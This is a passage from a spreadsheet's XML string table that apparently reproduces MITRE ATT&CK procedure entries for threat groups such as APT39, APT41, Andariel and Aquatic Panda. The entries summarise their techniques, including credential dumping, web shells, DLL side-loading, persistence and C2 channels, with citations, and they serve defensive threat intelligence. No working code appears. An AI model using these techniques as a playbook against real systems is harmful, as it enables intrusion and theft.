    <t>[APT39](https://attack.mitre.org/groups/G0087) has used tools capable of stealing contents of the clipboard.(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to turn off the &lt;code&gt;RequireSigned&lt;/code&gt; feature which ensures only signed DLLs can be run on Windows.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has utilized AutoIt and custom scripts to perform internal reconnaissance.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used the Smartftp Password Decryptor tool to decrypt FTP passwords.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used remote access tools that leverage DNS in communications with C2.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used various tools to steal files from the compromised host.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to decrypt encrypted CAB files.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has exfiltrated stolen victim data through C2 communications.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used SQL injection for initial compromise.(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used various tools to proxy C2 communications.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to delete files after they are deployed on a compromised host.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used tools with the ability to search for files on a compromised host.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has downloaded tools to compromised hosts.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has utilized tools to capture mouse movements.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) used custom tools to create SOCK5 and custom protocol proxies between infected hosts.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used tools for capturing keystrokes.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used Mimikatz, Windows Credential Editor and ProcDump to dump credentials.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has created accounts on multiple compromised hosts to perform actions within the network.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has utilized tools to aggregate data prior to exfiltration.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious attachment.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has sent spearphishing emails in an attempt to lure users to click on a malicious link.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware disguised as Mozilla Firefox and a tool named mfevtpse.exe to proxy C2 communications, closely mimicking a legitimate McAfee file mfevtps.exe.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used [CrackMapExec](https://attack.mitre.org/software/S0488) and a custom port scanner known as BLUETORCH for network scanning.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used the post exploitation tool [CrackMapExec](https://attack.mitre.org/software/S0488) to enumerate network shares.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used different versions of Mimikatz to obtain credentials.(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used malware to drop encrypted CAB files.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used PowerShell to execute malicious code.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used a command line utility and a network scanner written in python.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used various strains of malware to query the Registry.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has maintained persistence using the startup folder.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has been seen using RDP for lateral movement and persistence, in some cases employing the rdpwinst tool for mangement of multiple sessions.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used [NBTscan](https://attack.mitre.org/software/S0590) and custom tools to discover remote systems.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used SMB for lateral movement.(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) used secure shell (SSH) to move laterally among their targets.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has created scheduled tasks for persistence.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used a screen capture utility to take screenshots on a compromised host.(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used post-exploitation tools including RemCom and the Non-sucking Service Manager (NSSM) to execute processes.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has modified LNK shortcuts.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has packed tools with UPX, and has repacked a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to thwart anti-virus detection.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious attachments to initially compromise victims.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer February 2018)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious links to initially compromise victims.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) used [Remexi](https://attack.mitre.org/software/S0375) to collect usernames from the system.(Citation: Symantec Chafer Dec 2015)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has modified and used customized versions of publicly-available tools like PLINK and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: BitDefender Chafer May 2020)(Citation: IBM ITG07 June 2019)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used stolen credentials to compromise Outlook Web Access (OWA).(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has utilized malicious VBS scripts in malware.(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has used HTTP in communications with C2.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) has installed ANTAK and ASPXSPY web shells.(Citation: FireEye APT39 Jan 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) leveraged sticky keys to establish persistence.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) created a RAR archive of targeted files for exfiltration.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by deleting Bash histories.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by clearing Windows security and system events.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming organizations.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used compiled HTML (.chm) files for targeting.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has used search order hijacking to execute malicious payloads, such as Winnti RAT.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used legitimate executables to perform DLL side-loading of their malware.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used DNS for C2 communications.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) </t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has uploaded files and data from a compromised host.(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) has configured payloads to load via LD_PRELOAD.(Citation: Crowdstrike GTR2020 Mar 2020)	</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific user accounts on specific machines. [APT41](https://attack.mitre.org/groups/G0096) has also environmentally keyed second stage malware with an RC5 key derived in part from the infected system's volume serial number.(Citation: Twitter ItsReallyNick APT41 EK)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) compromised an online billing/payment service using VPN access between a third-party service provider and the targeted payment service.(Citation: FireEye APT41 Aug 2019)
</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used the Steam community page as a fallback mechanism for C2.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) deleted files from the system.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate download via [ftp](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has executed &lt;code&gt;file /bin/pwd&lt;/code&gt; on exploited victims, perhaps to return architecture related information.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a keylogger called GEARSHIFT on a target system.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has used hashdump, [Mimikatz](https://attack.mitre.org/software/S0002), and the Windows Credential Editor to dump password hashes from memory and authenticate to other user accounts.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) created user accounts and adds them to the User and Admin groups.(Citation: FireEye APT41 Aug 2019) </t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has created services to appear as benign system tools.(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) attempted to masquerade their files as popular anti-virus software.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a malware variant called GOODLUCK to modify the registry in order to steal credentials.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a malware variant called WIDETONE to conduct port scans on specified subnets.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t xml:space="preserve"> [APT41](https://attack.mitre.org/groups/G0096) used the &lt;code&gt;net share&lt;/code&gt; command as part of network reconnaissance.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used VMProtected binaries in multiple intrusions.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) performed password brute-force attacks on the local admin account.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims’ environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a tool called CLASSFON to covertly proxy network communications.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) added a registry key in &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost&lt;/code&gt; to establish persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used RDP for lateral movement.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) deployed a Monero cryptocurrency mining tool in a victim’s environment.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) deployed rootkits on Linux systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has used rundll32.exe to execute a loader.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has transferred implant files using Windows Admin Shares.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used a compromised account to create a scheduled task on a system.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used  svchost.exe and [Net](https://attack.mitre.org/software/S0039) to execute a system service installed to launch a [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) collected MAC addresses from victim machines.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) </t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has enumerated IP addresses of network resources and used the &lt;code&gt;netstat&lt;/code&gt; command as part of network reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active RDP sessions.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used the WMIEXEC utility to execute &lt;code&gt;whoami&lt;/code&gt; commands on remote machines.(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002), [pwdump](https://attack.mitre.org/software/S0006), [PowerSploit](https://attack.mitre.org/software/S0194), and [Windows Credential Editor](https://attack.mitre.org/software/S0005).(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) executed &lt;code&gt;file /bin/pwd&lt;/code&gt; in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used compromised credentials to log on to other systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.(Citation: FireEye APT41 March 2020) </t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used &lt;code&gt;cmd.exe /c&lt;/code&gt; to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)
[APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence for the [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)</t>
  </si>
  <si>
    <t>[APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) created the StorSyncSvc service to provide persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used FireMalv custom-developed malware, which collected passwords from the Firefox browser storage.(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used Wrapper/Gholee, custom-developed malware, which downloaded additional malware to the infected system.(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has lured victims into executing malicious files.(Citation: FireEye Operation Saffron Rose 2013)</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used personalized spearphishing attachments.(Citation: Check Point Rocket Kitten)</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used various social media channels to spearphish victims.(Citation: FireEye Operation Saffron Rose 2013)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has collected large numbers of files from compromised network systems for later extraction.(Citation: FSI Andariel Campaign Rifle July 2017)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has used watering hole attacks, often with zero-day exploits, to gain initial access to victims within a specific IP range.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has exploited numerous ActiveX vulnerabilities, including zero-days.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: TrendMicro New Andariel Tactics July 2018)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has limited its watering hole attacks to specific IP address ranges.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has downloaded additional tools and malware onto compromised hosts.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has attempted to lure victims into enabling malicious macros within email attachments.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has used a variety of publicly-available remote access Trojans (RATs) for its operations.(Citation: FSI Andariel Campaign Rifle July 2017)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has used &lt;code&gt;tasklist&lt;/code&gt; to enumerate processes and find a specific string.(Citation: Kaspersky Andariel Ransomware June 2021)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has inserted a malicious script within compromised websites to collect potential victim information such as browser type, system language, Flash Player version, and other data.(Citation: TrendMicro New Andariel Tactics July 2018)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has conducted spearphishing campaigns that included malicious Word or Excel attachments.(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has hidden malicious executables within PNG files.(Citation: MalwareBytes Lazarus-Andariel Conceals Code April 2021)(Citation: Kaspersky Andariel Ransomware June 2021)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) has used the &lt;code&gt;netstat -naop tcp&lt;/code&gt; command to display TCP connections on a victim's machine.(Citation: Kaspersky Andariel Ransomware June 2021)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has run scripts to identify file formats including Microsoft Word.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has spread malware in target networks by copying modules to folders masquerading as removable devices.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used custom malware, including [Mongall](https://attack.mitre.org/software/S1026) and [Heyoka Backdoor](https://attack.mitre.org/software/S1027), in their operations.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used fake icons including antivirus and external drives to disguise malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used a dropper that employs a worm infection strategy using a removable device to breach a secure network environment.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has used the Themida packer to obfuscate malicious payloads.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) obtained the Heyoka open source exfiltration tool and subsequently modified it for their operations.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used WinRAR to compress memory dumps prior to exfiltration.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used DLL search-order hijacking to load `exe`, `dll`, and `dat` files into memory.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to stop endpoint detection and response (EDR) tools on compromised systems.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has deleted malicious executables from compromised machines.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has downloaded additional malware onto compromised hosts.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to harvest credentials through LSASS memory dumping.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has acquired and used [njRAT](https://attack.mitre.org/software/S0385) in its operations.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has encoded commands in Base64.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has downloaded additional scripts and executed Base64 encoded commands in PowerShell.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to discover third party endpoint detection and response (EDR) tools on compromised systems.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used native OS commands to understand privilege levels and system details.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has attempted to discover services for third party EDR products.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) has acquired and used [Cobalt Strike](https://attack.mitre.org/software/S0154) in its operations.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
